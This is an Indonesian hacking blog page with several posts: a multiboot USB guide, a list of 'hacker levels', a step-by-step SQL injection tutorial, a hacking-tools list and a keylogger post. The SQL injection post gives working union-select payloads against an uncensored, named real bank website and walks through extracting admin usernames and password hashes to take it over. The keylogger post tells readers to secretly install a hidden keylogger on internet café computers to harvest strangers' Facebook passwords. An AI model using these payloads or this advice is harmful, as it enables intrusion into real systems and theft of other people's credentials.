multboot dengan Hiren’s BootCD

Hiren’s BootCD + XP + Win7/Vista Dlm Satu Flash Disk by SOFTWARE ENGENERING Keperluan multboot buat user PC mmg sangat banyak membantu, utk menggabungkannya kedlm USB flash mmg butuh cara khusus. Utk menggabung Hiren’s BootCD, Windows XP, & Windows Vista/7 dlm satu flash disk, ikuti cara berikut:Yang perlu disiapkan: 1. Hiren’s BootCD (disarankan versi 9.7 keatas) 2. CD Installer Windows XP (rekomendasi SP3) 3. DVD Installer Windows Vista/Windows7 4. USB_MultiBoot_10 5. GRUB4DOS Langkah-langkahnya: Untuk toolnya bisa download disini : usb multi boot 10 Grub4dos Integrasi Windows XP Ektsrak USB MultiBoot 10 ke hardisk (mis di C:\USB_MultiBoot_10\). Masukkan CD Windows XP kedalam CD/DVD drive atau mount dengan PowerISO atau DaemonTools. Colokkan FD USB kemudian dari dalam folder USB_MultiBoot_10, jalankan file USB_MultiBoot_10.cmd. Akan muncul jendela prompt Windows, tekan sembarang tombol untuk mulai (Press any key to continue…). Berikutnya adalah memformat flash disk USB. Ada 2 tool yg disediakan untuk memformat flash disk anda: PeToUSB : flash disk masimal 2GB, dgn system file FAT. HP USB Disk Storage Format Tool : Flash disk diatas 2GB dgn system file FAT & NTFS. Pilih jenis tool utk format FD-nya (saya pake HP USB Disk Storage) lalu tekan tombol “H” & tekan ENTER. Pastikan nama Flash disk USB sdh tertera pada kotak Device HP USB Disk Storage Format dan pilih system file NTFS supaya proses instalasi dari FD jauh lebih cepat. Kalau sudah siap, tekan tombol Start. Tekan tombol Yes untuk pertanyaan message-box dari tool HP USB. Kalau proses format sudah selesai, klik tombol “Close”dan anda akan diantar ke jendela berikut: Tekan angka “1” pada keyboard lalu tekan ENTER. Pilih lokasi drive Windows XP. Klik tombol Yes pada kotak Unattended Install ? – XP Setup UserData in winnt.sif and $OEM$yg muncul. Selanjutnya silakan isi informasi nama user, organisasi, product key XP, nama komputer, password, dsb sama seperti melakukan instalasi normal dari CD installer XP. Jadi, nanti tidak perlu lagi mengisi data2 instalasi saat menginstal XP dari Flash disk. Selanjutnya tekan angka “2” lalu ENTER. Pilih lokasi drive FD. Ketik angka “3” lalu tekan ENTER untuk mulai menyalin file2 instalasi XP kedalam FD. Baca kotak2 pertanyaan yg muncul dan iyakan saja. Tahap pembuatan instalasi XP USB sudah selesai, tekan “Q” untuk menutup USB_MultiBoot_10.cmd. Integrasi Hiren’s BootCD Masukkan/mount CD/ISO Hiren’s dalam drive CD/DVD-ROM. Copy folder HBCD dan file autorun.infdari dalam drive Hiren’s BootCD kedalam FD. Ekstrak file grub4dos.zip yang sudah didownload, kemudian copy file gldr dan file menu.lstdari hasil ekstraksi tsb kedalam FD. Sekarang, FD USB multiboot sdh jadi dengan Windows XP dan Hiren’s BootCD didalamnya. Tinggal mengatur BIOS PC/laptop supaya bisa booting dari USB FD. Integrasi Windows 7/VistaCopy semua isi DVD Windows 7/Vista kedalam FD. Buka file menu.lstdalam FD dengan notepad lalu tambahkan baris berikut didalamnya: Code: title Windows 7 root (hd0,0) chainloader /bootmgr Selesai!! Special thanks for narcophilia for this tutorial info. posting binus hacker

0 komentar:

MENGENAL TINGKATAN HACKER

Terima kasih telah berkunjung ke blog saya,maaf untuk ketidak nyamanannya karena blog dalam masa pembangunan. mohon dukungan dan motivasinya ya.... ^_^, salam:solin. Adsense Indonesia ads Internet Marketing - Online ads ads mengenal tingkatan tentang hacker  |Label: hacker study Bookmark and Share Dalam dunia kita (hacker) terdapat tingkat/level. Seorang hacker akan melalui tahapan tahapan untuk menjadi sempurna. Tahapan tersebut ialah: 1. Mundane Person Tingkatan paling bawah. Seseorang pada tingkatan ini pada dasarnya tidak tahu sama sekali tentang hacker dan cara-caranya, walaupun ia mungkin memiliki komputer sendiri dan akses Internet. Ia hanya tahu bahwa yang namanya hacker itu membobol sistem komputer dan melakukan hal-hal yang negatif (tindak kejahatan). Padahal sebenarnya hacker bukan seperti itu, kecuali hacker tidak taat e-tik 2. Lamer Seseorang pada tingkatan ini masih dibingungkan oleh seluk beluk hacking karena ia berpikir bahwa melakukan hacking sama seperti cara-cara waras (dalam dunia underground berarti menggandakan perangkat lunak secara ilegal). Pengetahuannya tentang hal-hal seperti itu masih minim, tapi sudah mencoba belajar. Seseorang pada tingkatan ini sudah bisa mengirimkan trojan (yang dibuat orang lain) ke atau pada komputer orang lain ketika melakukan obrolan pada IRC atau ICQ dan menghapus file-file mereka. Padahal ia sendiri tidak tahu persis bagaimana trojan bekerja. Seseorang yang sukses menjadi hacker biasanya bisa melalui tahapan ini dengan cepat bahkan melompatinya. 3. Wannabe Pada tingkatan ini seseorang sudah mengetahui bahwa melakukan tindakan hack itu lebih dari sekedar menerobos masuk ke komputer orang lain. Ia lebih menganggap hal tersebut sebagai sebuah filsafat atau way of life. Akhirnya ia jadi ingin tahu lebih banyak lagi. Ia mulai mencari, membaca dan mempelajari tentang metode-metode hacking dari berbagai sumber. 4. Newbie Pada tingkatan ini ia sudah memiliki dasar-dasar teknik hacking. Ia akan mencoba menerobos masuk ke sistem orang lain hanya untuk mencoba apa yang sudah ia pelajari. Meskipun demikian, pada tingkatan ini ia mengerti bahwa ketika melakukan hacking ia tidak harus merusak sistem atau menghapus apa saja jika hal itu tidak diperlukan untuk menutupi jejaknya. 5. Hacker Sebenarnya sulit untuk mengatakan tingkatan akhir atau final dari hacker telah tercapai, karena selalu saja ada sesuatu yang baru untuk dipelajari atau ditemukan (mengumpulkan informasi dan mempelajarinya dengan cermat merupakan dasar-dasar yang sama bagi seorang hacker) dan hal tersebut juga tergantung perasaan (feeling). Meskipun demikian, menjadi seorang hacker memang lebih menjurus pada hal pemikiran. Hacker yang tidak taat pada etik akan menjadi: Dark-side Hacker Seorang Dark-side hacker sama seperti Darth Vader (tokoh dalam film Star Wars) yang tertarik dengan kekuatan kegelapan. Hal ini tidak ada hubungannya dengan masalah “baik” atau “jahat” tapi lebih kepada masalah “sah (sesuai hukum yang berlaku)” dan “kekacauan”. Seorang Dark-side hacker punya kemampuan yang sama dengan semua hacker, tapi “sisi gelap” dari pikirannya membuat ia menjadi unsur berbahaya. sooo.... nilailah diri kalian sendiri dan gunakanlah kemampuanmu untuk hal-hal positif. ngomong2 niiiii yeeee.....artikel ini saya sunting dari salah satu forum yang saya ikuti. semoga bermafaat hanya sebuah infomasi, dah hargailah informasi seperti kala kau menggunakannya.

0 komentar:

Hack Website menggunakan SQL injection

Hai teman teman berikut ini adalah cara Web attack (hack website) menggunakan cara SQL injection. Ok langsung saja bisa kamu lihat di bawah ini :

1. Menemukan target

Kita dapat menemukan calon korban dengan bantuan search engine (Google masih yang terbaik) dengan memanfaatkan pola-pola tertentu. Pola-pola inilah yang disebut dengan Dork. Dork yang kita gunakan adalah untuk mencari pola yang berhubungan dengan SQL (Database) maka dork ini sering juga disebut dengan SQL Dork.

N0LDR
“Hal di atas merupakan alasan kuat bagi Admin untuk selalu update dengan isu keamanan karena kita bias saja menjadi korban walaupun kita tidak memiliki musuh. Dengan masuk ke daftar hasil pencarian maka kita telah menjadi calon korban”

Perlu diketahui, dengan dork yang sama belum tentu kita mendapatkan calon korban yang sama ! Untuk tutorial ini, saya menggunakan Dork (Google bisa lebih banyak memberikan SQL Dork kepada anda dari pada diri saya sendiri ):

Dork-Dork bisa kamu lihat disini Kumpulan Dork SQL Injection Update 2010

Dari sekian banyak calon korban, maka:
http://www.bankpapua.com/kantor.php?jenis=2
merupakan target saya pada tutorial sederhana ini.

N0LDR
“Target sengaja tidak saya sensor agar PoC (Proof of Concept) pada tutorial ini jelas. Kepada para pembaca saya harapkan untuk tidak melakukan tindakan pengerusakan di kemudain hari pada web site ini. Ingat, dengan melakukan pengerusakan berarti anda membunuh karier terhormat anda di masa depan. Pergunakanlah sebatas pembelajaran”


2. Mencari celah kelemahan

Pengujian apakah calon korban memiliki kelemahan SQL atau tidak. Kita dapat menambahkan karakter minus (-) atau petik tunggal (‘) [tergantung pada sistem (- atau ‘)]pada query yang ada. Jika kita mendapatkan error berarti calon korban memiliki kelemahan terlepas dari bisa di injeksi lebih lanjut atau tidak.

(-) ditambahkan sebelum item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=-2
(‘) ditambahkan sesudah item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=2’

Pada tutorial ini, teknik kedua yang memunculkan error! (berarti web site target memiliki kelemahan SQL Injection. Error yang kita dapatkan adalah:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118


3. Mendapatkan jumlah kolom

Tahap selanjutnya adalah mendapatkan jumlah kolom pada tabel aktif. Tekniknya adalah dengan menggunkan perintah order by sebagai berikut:

http://www.bankpapua.com/kantor.php?jenis=2+order+by+1--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+2--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+3--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+4--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+5--
.
.
.
Kita lakukan pengujian satu persatu (boleh dilompat) hingga kita mendapatkan error yang berarti jumlah kolom terakhir (yang tidak error) merupakan jumlah kolom pada tabel aktif. Pada tutorial ini, kita mendapatkan error pada pengujian ke-6.

http://www.bankpapua.com/kantor.php?jenis=2+order+by+6--

Kita mendapatkan error:


Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118

Berarti jumlah kolom pada tabel aktif adalah 5 (pengujian terakhir yang tidak error)


4. Mendapatkan angka keberuntungan

Angka keberuntungan adalah angka yang dimunculkan oleh sistem yaitu angka antara range jumlah kolom aktif (dalam kasus ini 1-5). Perintah yang kita gunakan adalah union select sebagai berikut:


http://www.bankpapua.com/kantor.php?...C2%2C3%2C4%2C5--

[Jangan lupa menambahkan karakter minus (-) pada awal key (pada kasus kita, key adalah 2)]. Kita mendapatkan angka 1,2,3, dan 4. Di angka-angka inilah tempat kita melakukan query.


5. Mendapatkan versi database server

Dapatkan versi server SQL (dalam kasus ini, MySQL) dengan perintah version(), atau @@version. Kita gunakan version() dan kita pilih angka 4:

http://www.bankpapua.com/kantor.php?...%2C3%2Cversion(),5--

Kita mendapatkan 5.0.51a-24+lenny4 yang berarti MySQL versi 5. Kita sedikit beruntung karena menemukan versi 5 jika versi 4 maka tahap berikutnya adalah “Tebak-tebak buah nanas”.


6. Mendapatkan nama tabel

Gunakan perintah group_concat(table_name) dengan penyeleksian dari information_schema.tables sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(table_name),5+from+information_schema.tables+wher e+table_schema=database()--

Kita mendapatkan nama-nama tabel sebagai berikut:
adunasabah,agenda,anual,atm,atmprima,atmsama,berit a,birate,bunga,
galery,kantor,karir,kontak,konter,kurs,lapkeu,link ers,manajemen,pesertaquiz,
polling_d,polling_h,produk,promo,quiz_peserta,quiz _soal,regulasi,tamu,users. Dari sekian banyak kita pilih tabel users namun harus dikonversi ke heksadesimal terlebih dahulu. Silahkan kunjungi:

http://www.dolcevie.com/js/converter.html

kemudian kita mendapatkan (titik dua ( tidak diikutsertakan) users(ascii) -> 7573657273(hex)


7. Mendapatkan nama kolom

Gunakan perintah group_concat(column_name) dengan penyeleksian dari information_schema.columns sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(column_name),5+from+information_schema.columns+wh ere+table_name=0x7573657273--

0x7573657273 kita dapatkan dengan menggabungkan 0x dengan 7573657273 (hasil konversi tadi). Kita mendapatkan nama-nama kolom sebagai berikut:
ids,username,password,fullname,address,a_add,a_edi t,a_del,topadmin,akses. Kita pilih username dan password.


8. Mendapatkan Data

Gunakan perintah group_concat(username,0x3a,password) dengan penyeleksian tabel users tadi sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(username,0x3a,password),5+from+users--

Kita mendapatkan:

webmaster:    †¥²¯d”¥´¹¥¥¨±¬²»©¦£vttz
sdm:         †¥²¯d”¥´¹¥•¨±uvw
sekper:           †¥²¯d”¥´¹¥•©¯´©¶uvw

Terenkripsi   Tahap berikutnya adalah mendapatkan plain text dari password yang terenkripsi, google! Setelah dapat, cari halaman admin kemudian login dengan account webmaster, Anda telah berhasil take over http://www.bankpapua.com/

N0LDR
“Tutorial ini hanya sebagai pembelajaran semata. Hacking is good”
sumber : jasakom.com




0 komentar:

Hacker Tools 2012

disini saya ingin share kepada agan agan semua...semoga artikel ini bermanfaat.... anda pakai di 2012. Happy Hacking All:
Ayo Download Hacking Tools 2012 –  – Hack Tool 2012 – Hacker Tool 2012 – – Hacking Tool 2012 – Hack Tool 2012 – Cracking Tools 2012 – Cracker Tools 2012 – Cracking Tool 2012 – Cracker Tool 2012 – Crack Tools 2012 – Crack Tool 2012..
1. MySQL Password Auditor: Tools untuk melakukan audit / melakukan recovery password di MYSQL:
My Sql Password Auditor
2. Mole SQL Injection: Tool yang biasa digunakan untuk melakukan SQL Injection di website, sangat mudah dan nyaman.
Mole SQL Injection
3. X-SCAN: Tools ini digunakan untuk melakukan pengecekan vulnerability terhadap network.
XScan Tools By XFocus
4. SQLSUS SQL Injection: Ini adalah tools untuk melakukan SQL Injection juga, di buat dengan bahasa perl, jadi harus install perl untuk bisa menggunakan tools ini.
SQL Sus
5. W3AF Web Application Attack and Audit Framework: Merupakan tool untuk melakukan attack dan audit terhadap aplikasi website, tool ini sangat populer saat ini.
W3AF Tools
6. DIR BUSTER: Merupakan tools untuk mencari nama directory dan nama file yang ada di website, tools ini sangat bermanfaat untuk mengetahui informasi halaman apa saja yang ada di website target.
Directory Buster DirBuster OWASP
7. WINAUTOPWN: Merupakan sebuah tools yang digunakan untuk mengexploitasi secara langsung Windows Framework, sehingga secara otomatis kita yang akan menjadi administrator di windows tersebut. Banyak digunakan oleh “Defacer” Indonesia untuk melakukan deface terhadap Windows Server :)
Windows Auto PWN
8. Multi Thread TCP Port Scanner: Tools untuk melakukan scanning port yang sedang digunakan dengan multi threading, sehingga bisa berbagai IP & Port yang bisa anda check.
Multi Threader Sync TCP Port Scanner
9. NetworkMiner: Merupakan tools untuk melakukan analysis network forensik untuk Windows, banyak di gunakan untuk mengawasi lalu lintas network.
Network Miner
10. RAR Password Cracker: Kebanyakan digunakan untuk melakukan crack terhadap RAR yang di password.
Rar Password Cracker

0 komentar:

Hack Facebook menggunakan Keylogger

Woh ini aplikasi yang paling keren bisa merekam semua yang diketikkan dikeyboard....yang komputernya terpasang aplikasi ini..termasuk PASSWORD FACEBOOK .

download

Caranya gampang cuman instal aja diwarnet-warnet entar cek dech pasti kebanjiran akun facebook loe..... tapi kalau warnetnya menggunakan defreez ...agak sulit sich soalnya misalnya komputer yang kita pasang keylogger tadi akan gak ada lagi..!! Tapi jangan khawatir soalnya kebanyakan warnet setiap pelanggannya berhenti maen gak langsung di shuttdown cuman dihalangin dektop billing doank..jadi cara beraksinya...

1. Datang Kewarnet dulu dunk !
2. Instal aplikasi keyloggernya dan jangan lupa kalau di instal jangan lupa dihiden iconnya yang ada ditaskbaar.
3. Trus kita udahin ngenet..pulang dah kerumah..*tidur dulu
4. Tunggu ampe beberapa jam lah...trus datang lagi kewarnet yang kamu pasang keylogger tadi.. trus cek dech pasti terkejut dah ....akan kebanjiran password.

Oke ...tertarik silahkan download

Nah cara instalnya biasa ajah....
Pilih yang trial ajah..

kalau udah liat dipojok taskbar akan muncul icon keylogger dan klik ajah disitu entar akan muncul paswoordnya...

NB:Jangan lupa di hiden caranya klik kanan trus pilih hide..

0 komentar:

About Author

Foto Saya
banjarnegara, banjarnegara, Indonesia